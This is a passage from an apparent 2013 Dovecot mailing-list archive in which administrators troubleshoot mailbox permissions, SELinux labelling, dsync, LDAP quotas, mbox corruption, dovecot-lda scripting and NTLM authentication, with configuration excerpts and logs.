Dovecot is then supposed to write the mail to /var/mail/// using a virtual users setup. It seems to work except for failing when the mailbox is supposed to be initially created: Jun 22 03:25:04 lmtp(2400, dkasak at foo.org): Error: user dkasak at foo.org: Initialization failed: Namespace '': mkdir(/var/mail/foo.org/dkasak) failed: Permission denied (euid=5000(postman) egid=5000(postman) missing +w perm: /var/mail, we're not in group 6(mail), dir owned by 0:6 mode=0775) As can be seen from the error message, I've set mail_uid and mail_gid to account/group postman. /var/mail/ is empty and owned by root:mail so I've also set mail_privileged_group = mail. I was under the impression that mail_privileged_group is used precisely for these situations (when dotlocking or initial creation of the mailbox fail due to insufficient privileges), but it still doesn't work. If I either set mail_gid = mail, or set mail_access_groups = mail, or create foo.org/ owned by postman:postman by hand, it works as expected. Here is the complete configuration: # 2.2.2: /usr/local/etc/dovecot/dovecot.conf # OS: FreeBSD 9.1-RELEASE-p4 i386 ufs base_dir = /var/run/dovecot/ mail_gid = postman mail_location = maildir:/var/mail/%d/%n/:LAYOUT=fs mail_privileged_group = mail mail_uid = postman managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave namespace inbox { inbox = yes location = mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } prefix = separator = / type = private } passdb { args = scheme=CRYPT username_format=%u /etc/dovecot/users driver = passwd-file } plugin { sieve = ~/.dovecot.sieve sieve_dir = ~/sieve } protocols = imap lmtp service auth-worker { user = $default_internal_user } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0660 user = postfix } } service imap-login { inet_listener imap { port = 143 } } service lmtp { unix_listener /var/spool/postfix/private/dovecot-lmtp { group = postfix mode = 0660 user = postfix } } ssl = required ssl_cert = Hi, I have set-up dovecot on a F17 box and am encountering weirdnesses with SELinux (who isn't??). Again, I am trying to refrain from disabling SWLinux all together, however tempting, but am stuck in troubleshooting and hope for some ideas... With SELinux set to permissive, I can connect to dovecot and log in to access my mail as expected. With SELinux enforcing, I can connect to dovecot, but cannot login to access mail. The log states ,---- log_path = /var/log/dovecot (set in 10-logging.conf) | Jun 23 15:43:58 imap-login: Info: Login: user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, mpid=15189, secured, session= | Jun 23 15:43:58 imap(johndoe): Error: chdir(/home/user/data1/Maildir//) failed: Permission denied (euid=1000(user) egid=1000(user) missing +w perm: /home/user/data1/Maildir// stat(/home/user/data1/Maildir//) failed: Permission denied) | Jun 23 15:43:58 imap(johndoe): Error: chdir(/home/user/data1/Maildir/) failed: Permission denied | Jun 23 15:43:58 imap(johndoe): Error: user johndoe: Initialization failed: Namespace '': stat(/home/user/data1/Maildir//johndoe) failed: Permission denied (euid=1000(user) egid=1000(user) missing +w perm: /home/user/data1/Maildir//johndoe stat(/home/user/data1/Maildir//johndoe) failed: Permission denied) | Jun 23 15:43:58 imap(johndoe): Error: Invalid user settings. Refer to server log for more information. `---- Only thing I can grasp is *write permission* error. ls -l on the Maildirs shows this should not be the case for uid 1000. ,---- ls -l | drwxrwxr-x. 11 user user 4096 Jul 8 2012 Maildir | \> drwx------. 19 user user 4096 Feb 5 09:04 johndoe `---- I have no idea what the server log is referring to, in the debug log I get ,---- debug_log_path = /var/log/dovecot_debug (set in 10-logging.conf) | Jun 23 15:43:58 imap: Debug: Added userdb setting: mail=maildir:~/johndoe | Jun 23 15:43:58 imap(johndoe): Debug: Effective uid=1000, gid=1000, home=/home/user/data1/Maildir/ | Jun 23 15:43:58 imap(johndoe): Debug: Namespace inbox: type=private, prefix=, sep=., inbox=yes, hidden=no, list=yes, subscriptions=yes location=maildir:~/johndoe | Jun 23 15:43:58 imap(johndoe): Debug: maildir++: root=/home/user/data1/Maildir//johndoe, index=, control=, inbox=/home/user/data1/Maildir//johndoe, alt= `---- I had thought SELinux would log something, but /var/log/audit/audit.log is blank... Where to go from here?? Any ideas appreciated... -- Johnny From p.janusz at nsm.pl Sun Jun 23 18:29:57 2013 From: p.janusz at nsm.pl (Piotr Janusz) Date: Sun, 23 Jun 2013 17:29:57 +0200 Subject: [Dovecot] Dsync only one mailbox Message-ID: <0edab52b77fe20d9131a88d7fd45c02e@nsm.pl> Hi, I am looking for a way to sync only selected files/mailbox'es using dsync. Am I using the dsync -m option incorectly? It looks like it's being ignored. And as for the main INBOX (/var/mail/username) what should be the parameter for -m? dovecot --version 2.1.7 dsync -u pj -D -v -m Alerts -o mail_location=mdbox:/home/pj/mdbox backup mbox:/home/pj/:INBOX=/var/mail/pj doveadm(root): Debug: Loading modules from directory: /usr/lib/dovecot/modules doveadm(root): Debug: Module loaded: /usr/lib/dovecot/modules/lib10_quota_plugin.so doveadm(root): Debug: Loading modules from directory: /usr/lib/dovecot/modules/doveadm doveadm(root): Debug: Skipping module doveadm_acl_plugin, because dlopen() failed: /usr/lib/dovecot/modules/doveadm/lib10_doveadm_acl_plugin.so: undefined symbol: acl_user_module (this is usually intentional, so just ignore this message) doveadm(root): Debug: Skipping module doveadm_expire_plugin, because dlopen() failed: /usr/lib/dovecot/modules/doveadm/lib10_doveadm_expire_plugin.so: undefined symbol: expire_set_lookup (this is usually intentional, so just ignore this message) doveadm(root): Debug: Module loaded: /usr/lib/dovecot/modules/doveadm/lib10_doveadm_quota_plugin.so doveadm(root): Debug: Skipping module doveadm_zlib_plugin, because dlopen() failed: /usr/lib/dovecot/modules/doveadm/lib10_doveadm_zlib_plugin.so: undefined symbol: i_stream_create_deflate (this is usually intentional, so just ignore this message) doveadm(root): Debug: Skipping module doveadm_fts_plugin, because dlopen() failed: /usr/lib/dovecot/modules/doveadm/lib20_doveadm_fts_plugin.so: undefined symbol: fts_list_backend (this is usually intentional, so just ignore this message) doveadm(pj): Debug: Effective uid=3195, gid=3195, home=/home/pj doveadm(pj): Debug: Quota root: name=INBOX backend=fs args=mount=/var/:user doveadm(pj): Debug: Quota root: name=Katalog_domowy backend=fs args=mount=/home/:user doveadm(pj): Debug: Namespace inbox: type=private, prefix=, sep=, inbox=yes, hidden=no, list=yes, subscriptions=yes location=mdbox:/home/pj/mdbox doveadm(pj): Debug: fs: root=/home/pj/mdbox, index=, control=, inbox=, alt= doveadm(pj): Debug: fs quota add mailbox dir = /var/ doveadm(pj): Debug: fs quota block device = /dev/cciss/c0d0p4 doveadm(pj): Debug: fs quota mount point = /var doveadm(pj): Debug: fs quota mount type = ext4 doveadm(pj): Debug: fs quota add mailbox dir = /home/ doveadm(pj): Debug: fs quota block device = /dev/cciss/c0d1p1 doveadm(pj): Debug: fs quota mount point = /home doveadm(pj): Debug: fs quota mount type = ext4 doveadm(pj): Debug: Namespace : Using permissions from /home/pj/mdbox: mode=0700 gid=-1 dsync(pj): Debug: Effective uid=3195, gid=3195, home=/home/pj dsync(pj): Debug: Quota root: name=INBOX backend=fs args=mount=/var/:user dsync(pj): Debug: Quota root: name=Katalog_domowy backend=fs args=mount=/home/:user dsync(pj): Debug: Namespace inbox: type=private, prefix=, sep=, inbox=yes, hidden=no, list=yes, subscriptions=yes location=mbox:/home/pj/:INBOX=/var/mail/pj dsync(pj): Debug: fs: root=/home/pj, index=, control=, inbox=/var/mail/pj, alt= dsync(pj): Debug: fs quota add mailbox dir = /var/ dsync(pj): Debug: fs quota block device = /dev/cciss/c0d0p4 dsync(pj): Debug: fs quota mount point = /var dsync(pj): Debug: fs quota mount type = ext4 dsync(pj): Debug: fs quota add mailbox dir = /home/ dsync(pj): Debug: fs quota block device = /dev/cciss/c0d1p1 dsync(pj): Debug: fs quota mount point = /home dsync(pj): Debug: fs quota mount type = ext4 dsync(pj): Debug: Namespace : Using permissions from /home/pj: mode=0700 gid=-1 dsync(pj): Error: Failed to sync mailbox www/IMG_20121119_184255.jpg: Mailbox isn't a valid mbox file dsync(pj): Error: Failed to sync mailbox www/rtranalizer.exe: Mailbox isn't a valid mbox file dsync(pj): Error: Failed to sync mailbox www/raport_nsm.rar: Mailbox isn't a valid mbox file .... -- Piotr Janusz From me at junc.eu Sun Jun 23 19:30:14 2013 From: me at junc.eu (Benny Pedersen) Date: Sun, 23 Jun 2013 18:30:14 +0200 Subject: [Dovecot] tables between dovecot and postfix and a paradoxical question In-Reply-To: <1371857137.24914.18.camel@debian> References: <1371857137.24914.18.camel@debian> Message-ID: Mohsen Pahlevanzadeh skrev den 2013-06-22 01:25: > How can i combine together? i created username like this: # sql dump SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; SET time_zone = "+00:00"; CREATE TABLE IF NOT EXISTS `username` ( `concat(userid,"@",domain)` varchar(257) ); CREATE TABLE IF NOT EXISTS `users` ( `userid` varchar(128) NOT NULL, `domain` varchar(128) NOT NULL, `password` varchar(64) NOT NULL, `home` varchar(255) NOT NULL, `uid` int(11) NOT NULL, `gid` int(11) NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=latin1; INSERT INTO `users` (`userid`, `domain`, `password`, `home`, `uid`, `gid`) VALUES ('me', 'example.org', 'password', 'homedir', 1000, 1000); DROP TABLE IF EXISTS `username`; CREATE ALGORITHM=UNDEFINED DEFINER=`root`@`localhost` SQL SECURITY DEFINER VIEW `username` AS select concat(`users`.`userid`,'@',`users`.`domain`) AS `concat(userid,"@",domain)` from `users`; now username contains same info that postfixadmin creates :) -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From janfrode at tanso.net Sun Jun 23 22:18:17 2013 From: janfrode at tanso.net (Jan-Frode Myklebust) Date: Sun, 23 Jun 2013 21:18:17 +0200 Subject: [Dovecot] Dovecot + SELinux permission problems In-Reply-To: <87y5a0etua.fsf@gmx.co.uk> References: <87y5a0etua.fsf@gmx.co.uk> Message-ID: <20130623191817.GA23164@mushkin.tanso.net> On Sun, Jun 23, 2013 at 04:21:17PM +0100, Johnny wrote: > > I had thought SELinux would log something, but /var/log/audit/audit.log > is blank... Are you running auditd? I believe that if you're not running auditd, the denials should be logged to the kernel ring buffer. Does "dmesg" show any denials ? Likely dovecot doesn't have access user_home_dir_t/user_home_t. Is all users maildirs below /home/user/data1/Maildir/ ? If so, you can probably fix this by creating a labeling rule for this, and re-label everything below this directory: semanage fcontext -a -t mail_spool_t "/home/user/data1/Maildir(/.*)?" restorecon -R /home/user/data1/Maildir -jf From stephan at rename-it.nl Sun Jun 23 22:37:23 2013 From: stephan at rename-it.nl (Stephan Bosch) Date: Sun, 23 Jun 2013 21:37:23 +0200 Subject: [Dovecot] Preoccupied at the moment Message-ID: <51C74E73.6020804@rename-it.nl> Hi, Something's come up and I am preoccupied at the moment until the 2nd of July. I won't be answering Dovecot mailing list until then (maybe a day or two earlier). Regards, Stephan. From yggdrasil at gmx.co.uk Mon Jun 24 06:40:17 2013 From: yggdrasil at gmx.co.uk (Johnny) Date: Mon, 24 Jun 2013 04:40:17 +0100 Subject: [Dovecot] Dovecot + SELinux permission problems In-Reply-To: <20130623191817.GA23164@mushkin.tanso.net> (Jan-Frode Myklebust's message of "Sun, 23 Jun 2013 21:18:17 +0200") References: <87y5a0etua.fsf@gmx.co.uk> <20130623191817.GA23164@mushkin.tanso.net> Message-ID: <87r4fsb2hq.fsf@gmx.co.uk> Jan-Frode Myklebust writes: > On Sun, Jun 23, 2013 at 04:21:17PM +0100, Johnny wrote: >> >> I had thought SELinux would log something, but /var/log/audit/audit.log >> is blank... > > Are you running auditd? I believe that if you're not running auditd, the > denials should be logged to the kernel ring buffer. It seems auditd is not running and not happy to start; ,---- systemctl status auditd.service | Loaded: loaded (/usr/lib/systemd/system/auditd.service; enabled) | Active: failed (Result: exit-code) since Mon, 24 Jun 2013 04:28:28 +0100; 6s ago | Process: 5139 ExecStartPost=/sbin/auditctl -R /etc/audit/audit.rules (code=exited, status=0/SUCCESS) | Process: 5136 ExecStart=/sbin/auditd -n (code=exited, status=6) | CGroup: name=systemd:/system/auditd.service `---- > Does "dmesg" show any denials ? Nope, all it shows is turning on/off SELinux (I tried accessing the mail prior and post changing SElinux status) ,---- | [ 767.835481] type=1404 audit(1372044152.923:10): enforcing=0 old_enforcing=1 auid=1000 ses=1 | [ 777.110187] type=1404 audit(1372044162.218:11): enforcing=1 old_enforcing=0 auid=1000 ses=1 `---- > Likely dovecot doesn't have access user_home_dir_t/user_home_t. Is all > users maildirs below /home/user/data1/Maildir/ ? All users maildirs are under the same location, e.g. ,---- ls -Z | drwx------. user user system_u:object_r:mnt_t:s0 mailaccountA | drwx------. user user system_u:object_r:mnt_t:s0 mailaccountB | drwx------. user user unconfined_u:object_r:mnt_t:s0 mailaccountC | drwx------. user user unconfined_u:object_r:mnt_t:s0 mailaccountD `---- > If so, you can probably fix this by creating a labeling rule for this, > and re-label everything below this directory: > > semanage fcontext -a -t mail_spool_t "/home/user/data1/Maildir(/.*)?" > restorecon -R /home/user/data1/Maildir No luck with using this. I will look into this more tomorrow and hopefully locate some logs. -- Johnny From izul_2003 at yahoo.com Mon Jun 24 07:11:01 2013 From: izul_2003 at yahoo.com (izul) Date: Sun, 23 Jun 2013 21:11:01 -0700 (PDT) Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <51C45352.3030704@thelounge.net> References: <1371789010512-42906.post@n4.nabble.com> <51C45352.3030704@thelounge.net> Message-ID: <1372047061281-42947.post@n4.nabble.com> Guys..i'm sorry if my questions is too absurd. Let me explain first.FYI im a totally newbie in this mail server thing. The mail server admin who managed and created this server in 2010 is gone .no contact at all.And also no documentation about the server in detail. And now the server need to be upgraded. We wana build new server with data ( account + mailbox ) migrated from the old server. I've tried to follow dovecot migration tutorial in wiki but still no luck. So I post here for further help. Ok at first I get the idea that my dovecot version is too old for 2013. But IMHO thats too risky for me to upgrade to new version bcause of my knowledge. Afterall in wiki theres a tutorial Dovecot 1 . I want to focus on that instead of making change to my server. But now it still not working in my old server. I hope ill get answer in this forum. Again.. Sorry for my question if it categorized as flamming , OOT or something else. Im just a newbie with question and need some help.. Thanx guys.. -- View this message in context: http://dovecot.2317879.n4.nabble.com/Config-for-master-user-in-dovecot-1-1-20-tp42906p42947.html Sent from the Dovecot mailing list archive at Nabble.com. From genie at geniechka.ru Mon Jun 24 08:26:04 2013 From: genie at geniechka.ru (Eugene) Date: Mon, 24 Jun 2013 09:26:04 +0400 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <1372047061281-42947.post@n4.nabble.com> References: <1371789010512-42906.post@n4.nabble.com><51C45352.3030704@thelounge.net> <1372047061281-42947.post@n4.nabble.com> Message-ID: <34938EB0DFEB471DB8D9DEA60035A331@geniepc2011> Hello, Actually I have just recently migrated 2 Dovecot installations from 1.x to 2.x simply by installing the current version and pointing it to the same user and storage configuration. Worked like a charm. Best wishes Eugene -----Original Message----- From: izul Sent: Monday, June 24, 2013 8:11 AM To: dovecot at dovecot.org Subject: Re: [Dovecot] Config for master user in dovecot 1.1.20 Guys..i'm sorry if my questions is too absurd. Let me explain first.FYI im a totally newbie in this mail server thing. The mail server admin who managed and created this server in 2010 is gone .no contact at all.And also no documentation about the server in detail. And now the server need to be upgraded. We wana build new server with data ( account + mailbox ) migrated from the old server. I've tried to follow dovecot migration tutorial in wiki but still no luck. So I post here for further help. Ok at first I get the idea that my dovecot version is too old for 2013. But IMHO thats too risky for me to upgrade to new version bcause of my knowledge. Afterall in wiki theres a tutorial Dovecot 1 . I want to focus on that instead of making change to my server. But now it still not working in my old server. I hope ill get answer in this forum. Again.. Sorry for my question if it categorized as flamming , OOT or something else. Im just a newbie with question and need some help.. Thanx guys.. -- View this message in context: http://dovecot.2317879.n4.nabble.com/Config-for-master-user-in-dovecot-1-1-20-tp42906p42947.html Sent from the Dovecot mailing list archive at Nabble.com. From rs at sys4.de Mon Jun 24 09:45:21 2013 From: rs at sys4.de (Robert Schetterer) Date: Mon, 24 Jun 2013 08:45:21 +0200 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <1372047061281-42947.post@n4.nabble.com> References: <1371789010512-42906.post@n4.nabble.com> <51C45352.3030704@thelounge.net> <1372047061281-42947.post@n4.nabble.com> Message-ID: <51C7EB01.4080409@sys4.de> Am 24.06.2013 06:11, schrieb izul: > Sorry for my question if it categorized as flamming , OOT or > something else. Im just a newbie with question and need some help.. Everything was ok with your question, just ignore non tec answers some people tent to use abusive language and are well known for this they seem to forget that sooner or later they will be called acountable for that, cause their vile words are forbidden to use public, in most civilized countries Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From lst_hoe02 at kwsoft.de Mon Jun 24 11:05:30 2013 From: lst_hoe02 at kwsoft.de (lst_hoe02 at kwsoft.de) Date: Mon, 24 Jun 2013 10:05:30 +0200 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <1372047061281-42947.post@n4.nabble.com> References: <1371789010512-42906.post@n4.nabble.com> <51C45352.3030704@thelounge.net> <1372047061281-42947.post@n4.nabble.com> Message-ID: <20130624100530.Horde.2Z8YdGGjuOq3XFxR0owhHw1@webmail.kwsoft.de> Zitat von izul : > Guys..i'm sorry if my questions is too absurd. Let me explain first.FYI im a > totally newbie in this mail server thing. The mail server admin who managed > and created this server in 2010 is gone .no contact at all.And also no > documentation about the server in detail. And now the server need to be > upgraded. We wana build new server with data ( account + mailbox ) migrated > from the old server. I've tried to follow dovecot migration tutorial in wiki > but still no luck. So I post here for further help. > Ok at first I get the idea that my dovecot version is too old for 2013. But > IMHO thats too risky for me to upgrade to new version bcause of my > knowledge. Afterall in wiki theres a tutorial Dovecot 1 . I want to focus on > that instead of making change to my server. But now it still not working in > my old server. I hope ill get answer in this forum. > Again.. Sorry for my question if it categorized as flamming , OOT or > something else. Im just a newbie with question and need some help.. > > Thanx guys.. You question ist totaly valid, so no problem. With the problem as described i would go like this: - Build your new server with a distribution you feel comfortable with - Install the Dovecot Version provided by this distribution - Check the basic settings done by your install and adjust only the needed settings - Migrate the user/password store if they are local/on the same machine and check if its working - Check the mail input from the MTA - Copy one user mailbox to the new server, adjust permissions/owner if necessary and test if its working If all the steps suceed copy over all mailbox data. If your are i doubt and/or the mailsystem is critical for the company raise some budget to get external paid help. Regards Andreas -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 6144 bytes Desc: S/MIME Cryptographic Signature URL: From dalevizo at otenet.gr Mon Jun 24 12:43:52 2013 From: dalevizo at otenet.gr (dalevizo) Date: Mon, 24 Jun 2013 12:43:52 +0300 Subject: [Dovecot] Mbox corruption - Inbox beginning with 'FFrom' or 'FrFrom' In-Reply-To: <46c911fa708ebb793f0726049b798051@junc.eu> References: <51C1AB7B.9030404@otenet.gr> <46c911fa708ebb793f0726049b798051@junc.eu> Message-ID: <20130624094352.GA9999@otenet.gr> Yeah that's because by mistake we put quota both in 10-mail.conf and 20-imap.conf, however I don't see how that could be the cause of the problem. D. On Thu 20/06/2013 10:23, Benny Pedersen wrote: > Dimos Alevizos skrev den 2013-06-19 15:00: > > >protocol imap { > > imap_client_workarounds = delay-newmail tb-extra-mailbox-sep > > mail_max_userip_connections = 100 > > mail_plugins = quota imap_quota quota notify mail_log > >} > > quota listed 2 times > > -- > senders that put my email into body content will deliver it to my > own trashcan, so if you like to get reply, dont do it From tss at iki.fi Mon Jun 24 13:16:06 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 24 Jun 2013 13:16:06 +0300 Subject: [Dovecot] Mbox corruption - Inbox beginning with 'FFrom' or 'FrFrom' In-Reply-To: <51C1AB7B.9030404@otenet.gr> References: <51C1AB7B.9030404@otenet.gr> Message-ID: <4EAAD8C1-A99F-4D66-9FB6-32E634E4A8A5@iki.fi> On 19.6.2013, at 16.00, Dimos Alevizos wrote: > we're having some problems with our dovecot setup. > I've seen similar problems in the mailing list some years ago but alas wasn't able to find a solution. > > Our setup is as follows : > An MX farm (postfix) sends mails via LMTP to a director farm (dovecot 2.1.12) which proxies pop3/imap/lmtp traffic to a dovecot farm (dovecot 2.1.16). > All mailboxes and indexes are on NFS and all servers are Centos. > > The problem is that at times we see mailboxes (all of them are in mbox format) beginning with FFrom or FrFrom and of course dovecot says it's not a valid mbox file. This is quite an old bug, but it happens rarely enough that I haven't been able to reproduce and fix it. Actually people hadn't complained about it for a long time now, so I had assumed it had somehow gotten fixed already. With the attached debug patch it should crash instead of (completely) corrupting the mbox file. Debugging the resulting core file with gdb could be useful in figuring this out. Although I wouldn't recommend mbox format for any big installation anyway.. -------------- next part -------------- A non-text attachment was scrubbed... Name: diff Type: application/octet-stream Size: 414 bytes Desc: not available URL: -------------- next part -------------- From dalevizo at otenet.gr Mon Jun 24 13:41:31 2013 From: dalevizo at otenet.gr (dalevizo) Date: Mon, 24 Jun 2013 13:41:31 +0300 Subject: [Dovecot] Mbox corruption - Inbox beginning with 'FFrom' or 'FrFrom' In-Reply-To: <4EAAD8C1-A99F-4D66-9FB6-32E634E4A8A5@iki.fi> References: <51C1AB7B.9030404@otenet.gr> <4EAAD8C1-A99F-4D66-9FB6-32E634E4A8A5@iki.fi> Message-ID: <20130624104131.GB9999@otenet.gr> Thanx I'll try the patch as soon as possible and I'll let you know. It is indeed very rare. We're only seeing 4-5 corruptions in about 13 million logins per day. I've been trying to convince our design team that we should move to maildir, but the truth is that it's quite a change, and we're way too busy to deal with everything else AND a migration from mbox to maildir. D. On Mon 24/06/2013 13:16, Timo Sirainen wrote: > On 19.6.2013, at 16.00, Dimos Alevizos wrote: > > > we're having some problems with our dovecot setup. > > I've seen similar problems in the mailing list some years ago but alas wasn't able to find a solution. > > > > Our setup is as follows : > > An MX farm (postfix) sends mails via LMTP to a director farm (dovecot 2.1.12) which proxies pop3/imap/lmtp traffic to a dovecot farm (dovecot 2.1.16). > > All mailboxes and indexes are on NFS and all servers are Centos. > > > > The problem is that at times we see mailboxes (all of them are in mbox format) beginning with FFrom or FrFrom and of course dovecot says it's not a valid mbox file. > > This is quite an old bug, but it happens rarely enough that I haven't been able to reproduce and fix it. Actually people hadn't complained about it for a long time now, so I had assumed it had somehow gotten fixed already. > > With the attached debug patch it should crash instead of (completely) corrupting the mbox file. Debugging the resulting core file with gdb could be useful in figuring this out. > > Although I wouldn't recommend mbox format for any big installation anyway.. > > > From morpheus.ibis at gmail.com Mon Jun 24 16:35:18 2013 From: morpheus.ibis at gmail.com (Pavel Herrmann) Date: Mon, 24 Jun 2013 15:35:18 +0200 Subject: [Dovecot] Quota based on LDAP group Message-ID: <7756319.TdIDd1AI5F@gesher> Hi I have a setup where my dovecot (2.0, if that makes a difference) authenticates against an LDAP directory. In my scenario, I have two types of users, lets call them "normal" and "privileged". What I need is for the normal user to have a fixed quota, but for the priviledged to have none. (The users do not exist on the underlying system, so I cant do quota based on FS) The issue is that my LDAP is actually an AD, and there is a fair amount of new accounts over the time (in other words, I cannot use LDAP attribute for storing quota, because the AD tools don't understand it, and I would have to add it manually for each new account). The approach I had in mind is using quota based on user group (I do have groups representing both normal and priviledged users), but I cannot find a way to set it up in dovecot. Am I missing something or does dovecot not support LDAP groups as attribute source? thanks Pavel Herrmann From ben at indietorrent.org Mon Jun 24 17:19:22 2013 From: ben at indietorrent.org (Ben Johnson) Date: Mon, 24 Jun 2013 10:19:22 -0400 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <51C558D8.1070207@gmx.de> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> <51C30B3D.3070109@indietorrent.org> <51C32ED5.2090709@indietorrent.org> <1371780023.2588.175.camel@worklian> <51C48EAE.5020308@indietorrent.org> <51C4A323.6030905@ii.nl> <51C4AF88.3040205@indietorrent.org> <51C558D8.1070207@gmx.de> Message-ID: <51C8556A.4080509@indietorrent.org> On 6/22/2013 3:57 AM, e-frog wrote: > unix_listener config { > mode = 0600 > user = vmail > } > } Brilliant; this fixed the issue! I can't thank you enough, e-frog. Thank you also to Bob, Ben, and Joseph. Your assistance was hugely helpful. Very best regards, -Ben From zoli at lippai.net Mon Jun 24 17:32:31 2013 From: zoli at lippai.net (Lippai Zoltan) Date: Mon, 24 Jun 2013 16:32:31 +0200 Subject: [Dovecot] Sieve file permission problem In-Reply-To: References: <25E4BE7C7FD74CAF870820FCE3956BBB@lippai.net> Message-ID: > Er, below you've wrote that "It uses port 2000 to communicate with dovecot via the ManageSieve plugin." Now you write "webmail can't modify them" ... . So it seems that the webmail is not using port 2000?? Sorry, I meant that it can't modify the rules via ManageSieve. I'm pretty sure, that the webmail is using the ManageSieve server and not modifying the files directly, because I only had to set the host and port for the Sieve server. I tried to modify the sieve scripts by telnetting into ManagieSieve server and it succeeded, so at this point I'm really not sure what might be wrong here. I will try to debug the communication between the webmail and the sieve server, I believe that holds the key to the solution. From ben at indietorrent.org Mon Jun 24 18:59:52 2013 From: ben at indietorrent.org (Ben Johnson) Date: Mon, 24 Jun 2013 11:59:52 -0400 Subject: [Dovecot] dovecot-lda - dovecot: quota-warning: Error: lda: Fatal: Unknown argument Message-ID: <51C86CF8.4040906@indietorrent.org> Hi, everyone, I'm attempting to configure automated quota warnings for users and have hit a snag. The script I'm using is as follows: --------------------------------------------------------------------- #!/bin/sh PERCENT=$1 MAILBOX=$2 DOMAIN=$3 cat << EOF | /usr/lib/dovecot/dovecot-lda -d $USER -o "plugin/quota=dict:user::file:/var/vmail/%d/%n/.quotausage" From: postmaster@$DOMAIN Subject: Email quota warning - mailbox over $PERCENT% full [...] --------------------------------------------------------------------- When the script is triggered, here's what appears in the log: --------------------------------------------------------------------- Jun 24 11:16:53 host dovecot: quota-warning: Error: lda: Fatal: Unknown argument: plugin/quota=dict:user::noenforcing:file:/var/vmail/%d/%n/.quotausage Jun 24 11:16:53 host dovecot: master: Error: service(quota-warning): child 22415 returned error 64 --------------------------------------------------------------------- If I paste the same on the command line, the message is delivered, as expected: /usr/lib/dovecot/dovecot-lda -d user at example.com -o "plugin/quota=dict:user::noenforcing:file:/var/vmail/%d/%n/.quotausage" -p /tmp/test.txt The problem seems to be that the -o switch isn't being interpreted correctly when dovecot-lda is called from within the script. -o is the correct switch, yes? From the manual at http://wiki2.dovecot.org/LDA : -o name=value: Override a setting from dovecot.conf. You can give this parameter multiple times. What am I missing here? Is some shell script escaping or similar required? Thanks for any tips! -Ben From utegrad at gmail.com Mon Jun 24 19:25:31 2013 From: utegrad at gmail.com (Matthew Larsen) Date: Mon, 24 Jun 2013 09:25:31 -0700 Subject: [Dovecot] NTLM Authentication for Postfix SMTP clients Message-ID: <51C872FB.7090009@gmail.com> I'm trying to get NTLM authentication working with Dovecot to authenticate Postfix SMTP clients. I can authenticate postfix smtp clients using the plain text login mechanism through winbind. However, using the NTLM mechanism gives me an error in my maillog that says: "dovecot: auth: winbind(?,10.20.2.0): user not authenticated: NT_STATUS_UNSUCCESSFUL". At this point, I'm rather stuck. It appears PAM and winbind work for authenticating with AD because it works with the plain text mechanism, but I'm missing something with the NTLM authentication method. Any suggestions as to what I've got wrong, or other logging I can turn up / examine that might shed some light on this? When I use the LOGIN mechanism I see this in the mail logging and the message is relayed: Jun 21 13:12:58 SBSMTPNV05 postfix/smtpd[1501]: connect from nvit01b.mydomain.com[10.20.2.0] Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: auth client connected (pid=1501) Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0111#011PLAIN#011service=smtp#011nologin#011lip=10.20.4.12#011rip=10.20.2.0#011resp=AG[...snip...]g== Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: pam(myusername,10.20.2.0): lookup service=dovecot Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: pam(myusername,10.20.2.0): #1/1 style=1 msg=Password: Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: client out: OK#0111#011user=myusername Jun 21 13:12:58 SBSMTPNV05 postfix/smtpd[1501]: 54EAF8059B: client=nvit01b.mydomain.com[10.20.2.0], sasl_method=PLAIN, sasl_username=myusername Jun 21 13:12:58 SBSMTPNV05 postfix/cleanup[1504]: 54EAF8059B: message-id=<51C4B3C8.30008 at domain1.com> Jun 21 13:12:58 SBSMTPNV05 postfix/qmgr[1499]: 54EAF8059B: from=, size=2700, nrcpt=1 (queue active) Jun 21 13:12:58 SBSMTPNV05 postfix/smtpd[1501]: disconnect from nvit01b.mydomain.com[10.20.2.0] Jun 21 13:12:59 SBSMTPNV05 postfix/smtp[1505]: 54EAF8059B: to=, relay=gmail-smtp-in.l.google.com[74.125.25.27]:25, delay=1.2, delays=0.23/0.04/0.16/0.72, dsn=2.0.0, status=sent (250 2.0.0 OK 1371845579 wf5si3786287pab.138 - gsmtp) Jun 21 13:12:59 SBSMTPNV05 postfix/qmgr[1499]: 54EAF8059B: removed I also see this in the secure log: Jun 21 13:12:58 SBSMTPNV05 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=myusername rhost=10.20.2.0 user=myusername Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:auth): getting password (0x00000010) Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:auth): pam_get_item returned a password Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:auth): user 'myusername' granted access Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:account): user 'myusername' granted access However, when I switch the mechanism to 